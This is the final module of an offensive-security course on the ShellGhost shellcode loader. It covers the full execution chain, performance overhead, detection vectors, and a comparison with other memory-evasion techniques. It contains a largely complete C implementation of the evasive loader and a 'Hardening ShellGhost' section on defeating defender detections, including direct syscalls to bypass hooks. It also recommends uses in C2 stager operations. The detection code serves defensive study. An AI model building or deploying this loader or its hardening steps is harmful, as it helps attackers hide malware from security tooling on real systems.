Module 8: Full Chain, Performance & Detection
The complete execution flow, real-world performance implications, detection vectors, and how ShellGhost compares to other memory evasion techniques.
Module Objective
This final module consolidates everything into a complete end-to-end walkthrough of ShellGhost, analyzes the performance overhead of per-instruction exception handling, catalogs the detection vectors that defenders can use to identify ShellGhost, and compares it against alternative memory evasion techniques like sleep encryption and module stomping. You will leave this module with a complete understanding of ShellGhost's strengths, limitations, and place in the offensive tooling landscape.
1. Complete Execution Flow
Here is the complete ShellGhost chain from program start to shellcode completion, combining every concept from the previous seven modules:
ShellGhost End-to-End Pipeline
mapping.py
Encrypted data + map
Fill with 0xCC
First = 1
.text end entry
Per-instruction
Remove VEH, free
C// Complete ShellGhost implementation (simplified, shows architecture)
#include <windows.h>
#include <string.h>
// ============ Types ============
typedef struct _CRYPT_BYTES_QUOTA {
DWORD rva;
DWORD quota;
} CRYPT_BYTES_QUOTA;
typedef NTSTATUS (WINAPI *_SystemFunction032)(
PUNICODE_STRING, PUNICODE_STRING);
// ============ Global State ============
static struct {
PBYTE exec_base;
SIZE_T exec_size;
PBYTE enc_sc; // Pre-encrypted shellcode (from mapping.py)
SIZE_T sc_size;
CRYPT_BYTES_QUOTA *map;
DWORD num_instr;
DWORD current_index;
INT prev_index;
BYTE key[16];
USHORT key_len;
_SystemFunction032 pSF032;
} G;
// ============ VEH Handler ============
LONG CALLBACK Handler(PEXCEPTION_POINTERS ep) {
PEXCEPTION_RECORD r = ep->ExceptionRecord;
PCONTEXT c = ep->ContextRecord;
DWORD old;
if (r->ExceptionCode == EXCEPTION_BREAKPOINT) {
// Rip already adjusted by kernel (no -1 needed)
PBYTE addr = (PBYTE)c->Rip;
if (addr < G.exec_base ||
addr >= G.exec_base + G.exec_size)
return EXCEPTION_CONTINUE_SEARCH;
// Toggle to RW for writing
VirtualProtect(G.exec_base, G.exec_size,
PAGE_READWRITE, &old);
// Re-encrypt previous instruction
if (G.prev_index >= 0) {
CRYPT_BYTES_QUOTA *prev = &G.map[G.prev_index];
memset(G.exec_base + prev->rva, 0xCC, prev->quota);
}
// Decrypt current instruction via SystemFunction032
CRYPT_BYTES_QUOTA *curr = &G.map[G.current_index];
memcpy(G.exec_base + curr->rva,
G.enc_sc + curr->rva, curr->quota);
UNICODE_STRING data = {
(USHORT)curr->quota, (USHORT)curr->quota,
(PWSTR)(G.exec_base + curr->rva) };
UNICODE_STRING key = {
G.key_len, G.key_len, (PWSTR)G.key };
G.pSF032(&data, &key);
// Toggle to RX for execution
VirtualProtect(G.exec_base, G.exec_size,
PAGE_EXECUTE_READ, &old);
G.prev_index = G.current_index;
G.current_index++;
return EXCEPTION_CONTINUE_EXECUTION;
}
return EXCEPTION_CONTINUE_SEARCH;
}
// ============ Main ============
void ShellGhostRun(
PBYTE enc_sc, SIZE_T sc_size, // From mapping.py
CRYPT_BYTES_QUOTA *map, DWORD n_instr,
PBYTE key, USHORT key_len
) {
// 1. Store references
G.enc_sc = enc_sc;
G.sc_size = sc_size;
G.map = map;
G.num_instr = n_instr;
memcpy(G.key, key, key_len);
G.key_len = key_len;
G.prev_index = -1;
G.current_index = 0;
// 2. Resolve SystemFunction032
G.pSF032 = (_SystemFunction032)GetProcAddress(
LoadLibraryA("advapi32.dll"), "SystemFunction032");
// 3. Allocate RW buffer filled with 0xCC
G.exec_base = (PBYTE)VirtualAlloc(NULL, sc_size,
MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
memset(G.exec_base, 0xCC, sc_size);
G.exec_size = sc_size;
// 4. Register VEH handler
PVOID h = AddVectoredExceptionHandler(1, Handler);
// 5. Create thread at end of .text segment
LPVOID entry = ResolveEndofTextSegment();
HANDLE hThread = CreateThread(NULL, 0,
(LPTHREAD_START_ROUTINE)entry, NULL, 0, NULL);
WaitForSingleObject(hThread, INFINITE);
// 6. Cleanup
RemoveVectoredExceptionHandler(h);
VirtualFree(G.exec_base, 0, MEM_RELEASE);
}
2. Performance Impact Analysis
ShellGhost's per-instruction exception model introduces significant overhead compared to native execution. Understanding the performance cost is essential for assessing when this technique is practical.
Exception Overhead Breakdown
| Operation | Approximate Cost | Frequency |
|---|---|---|
| Kernel trap (INT3) | ~1,000-5,000 cycles | Once per instruction |
| Context save to KTRAP_FRAME | ~500-1,000 cycles | Once per instruction |
| User-mode dispatch (KiUserExceptionDispatcher) | ~2,000-5,000 cycles | Once per instruction |
| VEH handler lookup + call | ~100-500 cycles | Once per instruction |
| SystemFunction032 decrypt | ~50-200 cycles | Once per instruction |
| VirtualProtect RW↔RX toggle | ~1,000-3,000 cycles | Twice per instruction (RX→RW, then RW→RX) |
| Memory write (re-encrypt + decrypt) | ~10-100 cycles | Once per instruction |
| NtContinue (restore CONTEXT) | ~2,000-5,000 cycles | Once per instruction |
Total overhead per shellcode instruction: approximately 7,000 to 20,000 CPU cycles. A typical instruction executes in 1-5 cycles natively. This means ShellGhost imposes a slowdown factor of roughly 1,500x to 20,000x. Note that the one-exception model (breakpoint only, no single-step) is approximately half the exception overhead of a two-exception approach.
Practical Impact
| Shellcode Type | Native Execution | ShellGhost Execution | Verdict |
|---|---|---|---|
| Stager (small, network setup) | <1 ms | ~50-200 ms | Acceptable for a stager payload |
| Stageless beacon (~200KB) | ~1 ms | ~5-30 seconds for initial setup | Noticeable delay but usually tolerable |
| Continuous C2 loop | Real-time | Significant latency per iteration | ShellGhost is best for initialization, not continuous operation |
| Compute-heavy shellcode | Varies | Extremely slow | Not suitable for compute-bound payloads |
Mitigation: Hybrid Approach
ShellGhost is most effective as a stager or initialization mechanism. The shellcode executed under ShellGhost's protection performs the minimum necessary work (resolve APIs, establish initial C2 connection, allocate new memory) and then copies a second-stage payload to a new region for native-speed execution. This way, the most sensitive phase (initial beacon setup, which is the most likely time for a memory scan) is protected, while long-running operations execute at normal speed.
3. Detection Vectors
While ShellGhost defeats memory signature scanning, it introduces several behavioral indicators that defenders can detect:
| Detection Vector | Observable Indicator | Detection Method | Difficulty |
|---|---|---|---|
| VEH Registration | AddVectoredExceptionHandler API call | API hook, ETW Microsoft-Windows-Kernel-Audit-API-Calls provider | Easy |
| Excessive Exceptions | Thousands of EXCEPTION_BREAKPOINT per second | Performance counters, ETW exception events, kernel callbacks | Medium |
| RW/RX Memory Toggling | Frequent VirtualProtect calls toggling between PAGE_READWRITE and PAGE_EXECUTE_READ | API hook on VirtualProtect, ETW memory protection events | Medium |
| 0xCC-Filled Memory | A memory region containing almost entirely 0xCC bytes | Heuristic scan for homogeneous INT3 regions | Medium |
| VEH Handler List Inspection | Non-standard VEH handlers registered in the process | Walking ntdll!LdrpVectorHandlerList | Medium |
| Thread Entry Point | Thread with entry point in the .text segment (at null bytes near the end) | Thread creation monitoring, unusual start address analysis | Hard |
| KiUserExceptionDispatcher Frequency | Extremely high rate of user-mode exception dispatch | Hooking KiUserExceptionDispatcher or monitoring debug events | Medium |
4. Detection Deep Dive: VEH Registration Monitoring
C// Defender perspective: detecting VEH handler registration
// Method 1: Hook AddVectoredExceptionHandler
typedef PVOID (WINAPI *pAddVEH)(ULONG, PVECTORED_EXCEPTION_HANDLER);
pAddVEH OriginalAddVEH;
PVOID WINAPI HookedAddVEH(ULONG First, PVECTORED_EXCEPTION_HANDLER Handler) {
// Log the registration
LogEvent("VEH handler registered: First=%d, Handler=%p", First, Handler);
// Check if the handler address is in a suspicious region
MEMORY_BASIC_INFORMATION mbi;
VirtualQuery(Handler, &mbi, sizeof(mbi));
if (mbi.Type == MEM_PRIVATE && mbi.State == MEM_COMMIT) {
AlertEvent("VEH handler in private memory (potential shellcode)");
}
return OriginalAddVEH(First, Handler);
}
// Method 2: Walk the VEH handler list directly
// (requires knowledge of ntdll internal structures)
// The handler list is at ntdll!LdrpVectorHandlerList
5. Detection Deep Dive: Exception Rate Monitoring
C// Defender perspective: detecting excessive exception rates
// Using Windows Performance Counters or ETW
// Normal process: 0-10 exceptions per second
// ShellGhost process: 10,000-100,000+ exceptions per second
// ETW-based detection:
// Provider: Microsoft-Windows-Kernel-Audit-API-Calls
// Events: Exception dispatch events
// Threshold: Alert if > 1000 exceptions/second sustained
Exception Rate as an IoC
A normal Windows process generates very few exceptions during regular operation. ShellGhost generates one EXCEPTION_BREAKPOINT for every single shellcode instruction. A typical shellcode payload might execute tens of thousands of instructions during initialization alone. This creates an exception rate that is orders of magnitude above normal, making it a strong Indicator of Compromise (IoC) for behavioral detection. Note that ShellGhost's one-exception model generates half the exceptions compared to a two-exception (breakpoint + single-step) approach, but this is still far above baseline.
6. Comparison with Other Memory Evasion Techniques
| Technique | Decryption Surface | Performance | Detection Difficulty | Complexity |
|---|---|---|---|---|
| Sleep Encryption (Ekko) | Full payload during active phase | Minimal (native speed when active) | Medium (timer objects, VirtualProtect pattern) | Medium |
| Foliage | Full payload during active phase | Minimal (APC-based timer) | Medium (APC queue monitoring) | Medium-High |
| Module Stomping | Full payload (but appears backed by DLL) | Native speed | Medium (.text section hash mismatch) | Low-Medium |
| Page Guard Toggling | One page (4KB) | Moderate (one exception per page) | Medium (VirtualProtect frequency) | Medium |
| ShellGhost | 1 instruction (~1-15 bytes) | Very slow (1 exception + 2 VirtualProtect per instruction) | Medium (exception rate, VEH registration, RW/RX toggling) | High |
When to Use ShellGhost
- Ideal: When memory scanning is the primary detection concern and the shellcode is small (stagers, position-independent loaders)
- Good: As an initialization mechanism that transitions to native execution after setup
- Acceptable: When performance is not critical and stealth against memory forensics is paramount
- Not ideal: For large payloads, compute-intensive operations, or environments with strong behavioral monitoring
7. Hardening ShellGhost
Several modifications can make ShellGhost more resistant to the detection vectors identified above:
Reducing Observable Indicators
| Detection Vector | Hardening Approach |
|---|---|
| RW/RX toggling frequency | ShellGhost already avoids RWX by toggling between RW and RX. To reduce VirtualProtect call frequency, batch multiple instructions between toggles (increases decryption surface but reduces overhead). |
| VEH registration | Use direct syscalls for NtAddVectoredExceptionHandler to bypass API hooks |
| 0xCC-filled region | Fill unused bytes with random data instead of uniform 0xCC. Use a different single-byte trap instruction. |
| Exception rate | Add artificial delays between instructions to reduce exception frequency (further reduces performance) |
| VEH list inspection | Encode the handler pointer manually using the same scheme as RtlEncodePointer |
8. Course Summary
What You Have Learned
| Module | Topic | Key Concept |
|---|---|---|
| 1 | Memory Scanner Evasion | Full decryption creates a detectable window; minimal decryption surface is the goal |
| 2 | Software Breakpoints | INT3 (0xCC) is a 1-byte instruction that generates EXCEPTION_BREAKPOINT (0x80000003) |
| 3 | Vectored Exception Handling | VEH handlers run before SEH; AddVectoredExceptionHandler with First=1 gives highest priority |
| 4 | The ShellGhost Concept | One-exception cycle: each BREAKPOINT handler re-encrypts previous instruction AND decrypts current one |
| 5 | SystemFunction032 & Shellcode Mapping | Python preprocessing generates CRYPT_BYTES_QUOTA maps; SystemFunction032 provides per-instruction RC4 |
| 6 | VEH Handler Implementation | ContextRecord->Rip used directly (kernel-adjusted); RW/RX toggling via VirtualProtect |
| 7 | Background: Trap Flag & Single-Stepping | General x86 knowledge about TF/EXCEPTION_SINGLE_STEP (not used by ShellGhost) |
| 8 | Full Chain & Detection | ~1,500-20,000x slowdown; detectable via VEH registration, exception rate, RW/RX toggling |
The Core Innovation
ShellGhost's innovation is twofold: (1) the shellcode mapping preprocessing pipeline that disassembles shellcode and enables per-instruction independent encryption via SystemFunction032, and (2) the realization that a one-exception cycle using only EXCEPTION_BREAKPOINT (no trap flag) is sufficient for decrypt-execute-reencrypt semantics. Combined with RW/RX memory toggling and thread creation at the .text segment end, lem0nSec created a technique that makes shellcode effectively invisible to memory scanners while avoiding common IoCs like RWX memory and thread entry in private memory. This trade-off is compelling for scenarios where stealth matters more than performance — particularly for initial-stage execution.
Knowledge Check
Q1: What is the approximate performance overhead of ShellGhost compared to native shellcode execution?
Q2: Which detection vector is most straightforward for defenders to monitor?
Q3: What is the recommended use case for ShellGhost in a real operation?